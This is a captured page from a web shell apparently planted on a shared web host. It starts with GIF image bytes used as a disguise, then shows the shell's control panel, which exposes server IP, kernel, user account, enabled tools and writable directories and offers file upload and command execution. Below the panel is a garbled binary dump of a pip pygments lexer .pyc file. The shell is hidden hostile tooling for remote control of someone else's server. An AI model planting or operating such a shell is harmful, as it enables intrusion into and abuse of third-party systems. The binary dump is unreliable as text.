GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 104.21.83.152  /  Your IP : 216.73.216.251
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python38/lib/python3.8/site-packages/pip/_vendor/pygments/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/python38/lib/python3.8/site-packages/pip/_vendor/pygments/__pycache__/lexer.cpython-38.pyc
U

ʗRe}�@s�dZddlZddlZddlZddlmZmZddlmZddl	m
Z
mZmZm
Z
ddlmZmZmZmZmZmZddlmZdd	d
ddd
ddddddgZdddddgZedd��ZGdd�de�ZGdd�ded�ZGdd�de�ZGd d
�d
e�Z Gd!d"�d"�Z!e!�Z"Gd#d$�d$e#�Z$Gd%d&�d&�Z%d'd�Z&Gd(d)�d)�Z'e'�Z(d*d�Z)Gd+d�d�Z*Gd,d�de�Z+Gd-d.�d.e�Z,Gd/d	�d	ee,d�Z-Gd0d�d�Z.Gd1d
�d
e-�Z/d2d3�Z0Gd4d5�d5e,�Z1Gd6d7�d7e-e1d�Z2dS)8z�
    pygments.lexer
    ~~~~~~~~~~~~~~

    Base lexer classes.

    :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
�N)�
apply_filters�Filter)�get_filter_by_name)�Error�Text�Other�
_TokenType)�get_bool_opt�get_int_opt�get_list_opt�make_analysator�Future�guess_decode)�	regex_opt�Lexer�
RegexLexer�ExtendedRegexLexer�DelegatingLexer�LexerContext�include�inherit�bygroups�using�this�default�words)s�utf-8)s��zutf-32)s��zutf-32be)s��zutf-16)s��zutf-16becCsdS)N����xrr��/builddir/build/BUILDROOT/alt-python38-pip-22.2.1-2.el8.x86_64/opt/alt/python38/lib/python3.8/site-packages/pip/_vendor/pygments/lexer.py�<lambda>!�r"c@seZdZdZdd�ZdS)�	LexerMetaz�
    This metaclass automagically converts ``analyse_text`` methods into
    static methods which always return float values.
    cCs(d|krt|d�|d<t�||||�S)N�analyse_text)r�type�__new__)�mcs�name�bases�drrr!r'*szLexerMeta.__new__N)�__name__�
__module__�__qualname__�__doc__r'rrrr!r$$sr$c@s^eZdZdZdZdZgZgZgZgZ	dZ
dd�Zdd�Zdd	�Z
d
d�Zdd
d�Zdd�ZdS)ra�
    Lexer for a specific language.

    Basic options recognized:
    ``stripnl``
        Strip leading and trailing newlines from the input (default: True).
    ``stripall``
        Strip all leading and trailing whitespace from the input
        (default: False).
    ``ensurenl``
        Make sure that the input ends with a newline (default: True).  This
        is required for some lexers that consume input linewise.

        .. versionadded:: 1.3

    ``tabsize``
        If given and greater than 0, expand tabs in the input (default: 0).
    ``encoding``
        If given, must be an encoding name. This encoding will be used to
        convert the input string to Unicode, if it is not already a Unicode
        string (default: ``'guess'``, which uses a simple UTF-8 / Locale /
        Latin1 detection.  Can also be ``'chardet'`` to use the chardet
        library, if it is installed.
    ``inencoding``
        Overrides the ``encoding`` if given.
    NrcKs�||_t|dd�|_t|dd�|_t|dd�|_t|dd�|_|�dd	�|_|�d
�pZ|j|_g|_	t
|dd�D]}|�|�qpdS)
N�stripnlT�stripallF�ensurenl�tabsizer�encoding�guess�
inencoding�filtersr)�optionsr	r0r1r2r
r3�getr4r7r�
add_filter)�selfr8�filter_rrr!�__init__aszLexer.__init__cCs(|jrd|jj|jfSd|jjSdS)Nz<pygments.lexers.%s with %r>z<pygments.lexers.%s>)r8�	__class__r,�r;rrr!�__repr__ms
�zLexer.__repr__cKs&t|t�st|f|�}|j�|�dS)z8
        Add a new stream filter to this lexer.
        N)�
isinstancerrr7�append)r;r<r8rrr!r:ts
zLexer.add_filtercCsdS)a~
        Has to return a float between ``0`` and ``1`` that indicates
        if a lexer wants to highlight this text. Used by ``guess_lexer``.
        If this method returns ``0`` it won't highlight it in any case, if
        it returns ``1`` highlighting with this lexer is guaranteed.

        The `LexerMeta` metaclass automatically wraps this function so
        that it works like a static method (no ``self`` or ``cls``
        parameter) and the return value is automatically converted to
        `float`. If the return value is an object that is boolean `False`
        it's the same as if the return values was ``0.0``.
        Nr)�textrrr!r%|szLexer.analyse_textFc
s�t�t��s�jdkr$t��\�}nވjdkr�zddlm}Wn,tk
rj}ztd�|�W5d}~XYnXd}tD].\}}��|�rt�t	|�d��
|d�}q�qt|dkr�|��dd��}	��
|	�d	�p�d
d�}|�n(��
�j����d��r �t	d�d��n��d��r �t	d�d����
dd
����
dd
���j�rJ����n�j�r\��d
���jdk�rt���j���j�r���d
��s��d
7���fdd�}
|
�}|�s�t|�j��}|S)a=
        Return an iterable of (tokentype, value) pairs generated from
        `text`. If `unfiltered` is set to `True`, the filtering mechanism
        is bypassed even if filters are defined.

        Also preprocess the text, i.e. expand tabs and strip it if
        wanted and applies registered filters.
        r5�chardetr)rDzkTo enable chardet encoding guessing, please install the chardet library from http://chardet.feedparser.org/N�replaceir4ruz
�
�
c3s$����D]\}}}||fVq
dS�N)�get_tokens_unprocessed)�_�t�v�r;rCrr!�streamer�sz"Lexer.get_tokens.<locals>.streamer)rA�strr4r�pip._vendorrD�ImportError�
_encoding_map�
startswith�len�decode�detectr9rEr1�stripr0r3�
expandtabsr2�endswithrr7)r;rC�
unfilteredrJrD�e�decoded�bomr4�encrN�streamrrMr!�
get_tokens�sR	

�
�

zLexer.get_tokenscCst�dS)z�
        Return an iterable of (index, tokentype, value) pairs where "index"
        is the starting position of the token within the input text.

        In subclasses, implement this method as a generator to
        maximize effectiveness.
        N)�NotImplementedErrorrMrrr!rI�szLexer.get_tokens_unprocessed)F)r,r-r.r/r)�url�aliases�	filenames�alias_filenames�	mimetypes�priorityr=r@r:r%r`rIrrrr!r0s
;)�	metaclassc@s$eZdZdZefdd�Zdd�ZdS)ra 
    This lexer takes two lexer as arguments. A root lexer and
    a language lexer. First everything is scanned using the language
    lexer, afterwards all ``Other`` tokens are lexed using the root
    lexer.

    The lexers from the ``template`` lexer package use this base lexer.
    cKs0|f|�|_|f|�|_||_tj|f|�dSrH)�
root_lexer�language_lexer�needlerr=)r;�_root_lexer�_language_lexer�_needler8rrr!r=�szDelegatingLexer.__init__cCs�d}g}g}|j�|�D]H\}}}||jkrP|rF|�t|�|f�g}||7}q|�|||f�q|rx|�t|�|f�t||j�|��S)N�)rjrIrkrBrT�
do_insertionsri)r;rC�buffered�
insertions�
lng_buffer�irKrLrrr!rI�s


�z&DelegatingLexer.get_tokens_unprocessedN)r,r-r.r/rr=rIrrrr!r�s	c@seZdZdZdS)rzI
    Indicates that a state should include rules from another state.
    N�r,r-r.r/rrrr!r�sc@seZdZdZdd�ZdS)�_inheritzC
    Indicates the a state should inherit from its superclass.
    cCsdS)Nrrr?rrr!r@sz_inherit.__repr__N)r,r-r.r/r@rrrr!rv�srvc@s eZdZdZdd�Zdd�ZdS)�combinedz:
    Indicates a state combined from multiple states.
    cGst�||�SrH)�tupler')�cls�argsrrr!r'
szcombined.__new__cGsdSrHr)r;rzrrr!r=szcombined.__init__N)r,r-r.r/r'r=rrrr!rwsrwc@sFeZdZdZdd�Zddd�Zddd�Zdd	d
�Zdd�Zd
d�Z	dS)�_PseudoMatchz:
    A pseudo match object constructed from a string.
    cCs||_||_dSrH)�_text�_start)r;�startrCrrr!r=sz_PseudoMatch.__init__NcCs|jSrH)r}�r;�argrrr!r~sz_PseudoMatch.startcCs|jt|j�SrH)r}rTr|rrrr!�end!sz_PseudoMatch.endcCs|rtd��|jS)Nz
No such group)�
IndexErrorr|rrrr!�group$sz_PseudoMatch.groupcCs|jfSrH)r|r?rrr!�groups)sz_PseudoMatch.groupscCsiSrHrr?rrr!�	groupdict,sz_PseudoMatch.groupdict)N)N)N)
r,r-r.r/r=r~r�r�r�r�rrrr!r{s


r{csd�fdd�	}|S)zL
    Callback that yields multiple actions for each group in the match.
    Nc3s�t��D]�\}}|dkrqqt|�tkrR|�|d�}|r�|�|d�||fVq|�|d�}|dk	r|r||�|d�|_||t|�|d�|�|�D]}|r�|Vq�q|r�|��|_dS)N�)�	enumerater&rr�r~�posr{r�)�lexer�match�ctxrt�action�data�item�rzrr!�callback4s&�
zbygroups.<locals>.callback)Nr)rzr�rr�r!r0sc@seZdZdZdS)�_ThiszX
    Special singleton used for indicating the caller class.
    Used by ``using``.
    Nrurrrr!r�Jsr�csji�d�kr:��d�}t|ttf�r.|�d<nd|f�d<�tkrTd��fdd�	}nd	���fdd�	}|S)
a�
    Callback that processes the match with a different lexer.

    The keyword arguments are forwarded to the lexer, except `state` which
    is handled separately.

    `state` specifies the state that the new lexer will start in, and can
    be an enumerable such as ('root', 'inline', 'string') or a simple
    string which is assumed to be on top of the root state.

    Note: For that to work, `_other` must not be an `ExtendedRegexLexer`.
    �state�stack�rootNc3sj�r��|j�|jf��}n|}|��}|j|��f��D]\}}}||||fVq<|rf|��|_dSrH)�updater8r>r~rIr�r�r��r�r�r��lx�srtrKrL)�	gt_kwargs�kwargsrr!r�iszusing.<locals>.callbackc3s^��|j��f��}|��}|j|��f��D]\}}}||||fVq0|rZ|��|_dSrH)r�r8r~rIr�r�r�r���_otherr�r�rr!r�xs
)N)N)�poprA�listrxr)r�r�r�r�rr�r!rSs



c@seZdZdZdd�ZdS)rz�
    Indicates a state or state action (e.g. #pop) to apply.
    For example default('#pop') is equivalent to ('', Token, '#pop')
    Note that state tuples may be used as well.

    .. versionadded:: 2.0
    cCs
||_dSrH)r�)r;r�rrr!r=�szdefault.__init__N)r,r-r.r/r=rrrr!r�sc@s"eZdZdZddd�Zdd�ZdS)	rz�
    Indicates a list of literal words that is transformed into an optimized
    regex that matches any of the words.

    .. versionadded:: 2.0
    rocCs||_||_||_dSrH)r�prefix�suffix)r;rr�r�rrr!r=�szwords.__init__cCst|j|j|jd�S)N�r�r�)rrr�r�r?rrr!r9�sz	words.getN)roro)r,r-r.r/r=r9rrrr!r�s
c@sJeZdZdZdd�Zdd�Zdd�Zdd	�Zddd�Zd
d�Z	dd�Z
d
S)�RegexLexerMetazw
    Metaclass for RegexLexer, creates the self._tokens attribute from
    self.tokens on the first instantiation.
    cCs t|t�r|��}t�||�jS)zBPreprocess the regular expression component of a token definition.)rAr
r9�re�compiler�)ry�regex�rflagsr�rrr!�_process_regex�s
zRegexLexerMeta._process_regexcCs&t|�tks"t|�s"td|f��|S)z5Preprocess the token component of a token definition.z2token type must be simple type or callable, not %r)r&r�callable�AssertionError)ry�tokenrrr!�_process_token�s�zRegexLexerMeta._process_tokencCst|t�rd|dkrdS||kr$|fS|dkr0|S|dd�dkrRt|dd��Sdsbtd|��n�t|t�r�d	|j}|jd
7_g}|D],}||ks�td|��|�|�|||��q�|||<|fSt|t��r|D] }||ks�|dks�td
|��q�|Sd�std|��dS)z=Preprocess the state transition action of a token definition.�#pop����#pushN�z#pop:Fzunknown new state %rz_tmp_%dr�zcircular state ref %r)r�r�zunknown new state zunknown new state def %r)	rArO�intr�rw�_tmpname�extend�_process_staterx)ry�	new_state�unprocessed�	processed�	tmp_state�itokens�istaterrr!�_process_new_state�s>



���z!RegexLexerMeta._process_new_statecCs�t|�tkstd|��|ddks0td|��||kr@||Sg}||<|j}||D�].}t|t�r�||ks~td|��|�|�||t|���qZt|t�r�qZt|t	�r�|�
|j||�}|�t
�d�jd|f�qZt|�tks�td|��z|�|d||�}Wn>tk
�rD}	ztd	|d|||	f�|	�W5d}	~	XYnX|�|d
�}
t|�dk�rhd}n|�
|d||�}|�||
|f�qZ|S)z%Preprocess a single state definition.zwrong state name %rr�#zinvalid state name %rzcircular state reference %rroNzwrong rule def %rz+uncompilable regex %r in state %r of %r: %sr��)r&rOr��flagsrArr�r�rvrr�r�rBr�r�r�rxr��	Exception�
ValueErrorr�rT)ryr�r�r��tokensr��tdefr��rex�errr�rrr!r��sJ
�

��
�zRegexLexerMeta._process_stateNcCs<i}|j|<|p|j|}t|�D]}|�|||�q$|S)z-Preprocess a dictionary of token definitions.)�_all_tokensr�r�r�)ryr)�	tokendefsr�r�rrr!�process_tokendefs
zRegexLexerMeta.process_tokendefc

Cs�i}i}|jD]�}|j�di�}|��D]�\}}|�|�}|dkr||||<z|�t�}Wntk
rpYq(YnX|||<q(|�|d�}|dkr�q(||||d�<z|�t�}	Wntk
r�Yq(X||	||<q(q|S)a
        Merge tokens from superclasses in MRO order, returning a single tokendef
        dictionary.

        Any state that is not defined by a subclass will be inherited
        automatically.  States that *are* defined by subclasses will, by
        default, override that state in the superclass.  If a subclass wishes to
        inherit definitions from a superclass, it can use the special value
        "inherit", which will cause the superclass' state definition to be
        included at that point in the state.
        r�Nr�)�__mro__�__dict__r9�items�indexrr�r�)
ryr��inheritable�c�toksr�r��curitems�inherit_ndx�new_inh_ndxrrr!�
get_tokendefs
s0


zRegexLexerMeta.get_tokendefscOsLd|jkr:i|_d|_t|d�r(|jr(n|�d|���|_tj	|f|�|�S)z:Instantiate cls after preprocessing its token definitions.�_tokensr�token_variantsro)
r�r�r��hasattrr�r�r�r�r&�__call__)ryrz�kwdsrrr!r�;s
zRegexLexerMeta.__call__)N)r,r-r.r/r�r�r�r�r�r�r�rrrr!r��s#,
1r�c@s$eZdZdZejZiZddd�ZdS)rz�
    Base for simple stateful regular expression-based lexers.
    Simplifies the lexing process so that you need only
    provide a list of states and regular expressions.
    �r�ccs�d}|j}t|�}||d}|D�](\}}}	|||�}
|
r"|dk	rrt|�tkrb|||
��fVn|||
�EdH|
��}|	dk	�rHt|	t�r�|	D]D}|dkr�t|�dkr�|�	�q�|dkr�|�
|d�q�|�
|�q�nbt|	t��rt|	�t|�k�r|dd�=n
||	d�=n,|	dk�r*|�
|d�nd�s<t
d|	��||d}qq"zP||d	k�r�d
g}|d
}|td	fV|d7}Wq|t||fV|d7}Wqtk
�r�Y�q�YqXqdS)z~
        Split ``text`` into (tokentype, text) pairs.

        ``stack`` is the initial stack (default: ``['root']``)
        rr�Nr�r�r�F�wrong state def: %rrFr�)r�r�r&rr�r�rArxrTr�rBr��absr�rrr�)r;rCr�r�r��
statestack�statetokens�rexmatchr�r��mr�rrr!rIlsR




z!RegexLexer.get_tokens_unprocessedN)r�)	r,r-r.r/r��	MULTILINEr�r�rIrrrr!rIsc@s"eZdZdZddd�Zdd�ZdS)rz9
    A helper object that holds lexer position data.
    NcCs*||_||_|pt|�|_|p"dg|_dS)Nr�)rCr�rTr�r�)r;rCr�r�r�rrr!r=�szLexerContext.__init__cCsd|j|j|jfS)NzLexerContext(%r, %r, %r))rCr�r�r?rrr!r@�s
�zLexerContext.__repr__)NN)r,r-r.r/r=r@rrrr!r�s
c@seZdZdZddd�ZdS)rzE
    A RegexLexer that uses a context object to store its state.
    Nccs<|j}|st|d�}|d}n|}||jd}|j}|D�]`\}}}|||j|j�}	|	r:|dk	r�t|�tkr�|j||	��fV|	��|_n$|||	|�EdH|s�||jd}|dk	�r�t	|t
��r|D]P}
|
dkr�t|j�dkr�|j��q�|
dk�r|j�
|jd�q�|j�
|
�q�nlt	|t��rZt|�t|j�k�rL|jdd�=n|j|d�=n0|dk�rx|j�
|jd�nd�s�td	|��||jd}q6q:zz|j|jk�r�W�q8||jd
k�r�dg|_|d}|jtd
fV|jd7_Wq6|jt||jfV|jd7_Wq6tk
�r4Y�q8Yq6Xq6dS)z
        Split ``text`` into (tokentype, text) pairs.
        If ``context`` is given, use this lexer context instead.
        rr�r�Nr�r�r�Fr�rF)r�rr�rCr�r�r&rr�rArxrTr�rBr�r�r�rrr�)r;rC�contextr�r�r�r�r�r�r�r�rrr!rI�s`




z)ExtendedRegexLexer.get_tokens_unprocessed)NN)r,r-r.r/rIrrrr!r�sc	cs�t|�}zt|�\}}Wn tk
r8|EdHYdSXd}d}|D]�\}}}|dkr\|}d}	|�r|t|�|k�r||	||�}
|
r�|||
fV|t|
�7}|D]"\}}}
|||
fV|t|
�7}q�||}	zt|�\}}Wq`tk
�rd}Y�qYq`Xq`|	t|�krF||||	d�fV|t|�|	7}qF|�r�|�pHd}|D]$\}}}|||fV|t|�7}�qNzt|�\}}Wn tk
�r�d}Y�q�YnX�q:dS)ag
    Helper for lexers which must combine the results of several
    sublexers.

    ``insertions`` is a list of ``(index, itokens)`` pairs.
    Each ``itokens`` iterable should be inserted at position
    ``index`` into the token stream given by the ``tokens``
    argument.

    The result is a combined token stream.

    TODO: clean up the code here.
    NTrF)�iter�next�
StopIterationrT)rrr�r�r��realpos�insleftrtrKrL�oldi�tmpval�it_index�it_token�it_value�prrr!rpsN

rpc@seZdZdZdd�ZdS)�ProfilingRegexLexerMetaz>Metaclass for ProfilingRegexLexer, collects regex timing info.csLt|t�r t|j|j|jd��n|�t��|��tjf����fdd�	}|S)Nr�cs`�jd���fddg�}t��}��|||�}t��}|dd7<|d||7<|S)Nr�rrr�)�
_prof_data�
setdefault�timer�)rCr��endpos�info�t0�res�t1�ry�compiledr�r�rr!�
match_funcMsz:ProfilingRegexLexerMeta._process_regex.<locals>.match_func)	rArrr�r�r�r��sys�maxsize)ryr�r�r�r�rr�r!r�Es

�z&ProfilingRegexLexerMeta._process_regexN)r,r-r.r/r�rrrr!r�Bsr�c@s"eZdZdZgZdZddd�ZdS)�ProfilingRegexLexerzFDrop-in replacement for RegexLexer that does profiling of its regexes.�r�c#s��jj�i�t��||�EdH�jj��}tdd�|��D��fdd�dd�}tdd�|D��}t	�t	d�jj
t|�|f�t	d	�t	d
d�t	d�|D]}t	d
|�q�t	d	�dS)NcssN|]F\\}}\}}|t|��d��dd�dd�|d|d||fVqdS)zu'z\\�\N�Ai�)�reprrWrE)�.0r��r�nrKrrr!�	<genexpr>cs�
�z=ProfilingRegexLexer.get_tokens_unprocessed.<locals>.<genexpr>cs
|�jSrH)�_prof_sort_indexrr?rr!r"fr#z<ProfilingRegexLexer.get_tokens_unprocessed.<locals>.<lambda>T)�key�reversecss|]}|dVqdS)�Nr)r�r rrr!rhsz2Profiling result for %s lexing %d chars in %.3f mszn==============================================================================================================z$%-20s %-64s ncalls  tottime  percall)r�r�zn--------------------------------------------------------------------------------------------------------------z%-20s %-65s %5d %8.4f %8.4f)r>r�rBrrIr��sortedr��sum�printr,rT)r;rCr��rawdatar��	sum_totalr+rr?r!rI^s(�
��z*ProfilingRegexLexer.get_tokens_unprocessedN)r�)r,r-r.r/r�rrIrrrr!r�Xsr�)3r/r�r�r��pip._vendor.pygments.filterrr�pip._vendor.pygments.filtersr�pip._vendor.pygments.tokenrrrr�pip._vendor.pygments.utilr	r
rrr
r�pip._vendor.pygments.regexoptr�__all__rR�staticmethod�_default_analyser&r$rrrOrrvrrxrwr{rr�rrrrr�rrrrpr�r�rrrr!�<module>s`
 ��!'
2)aH@

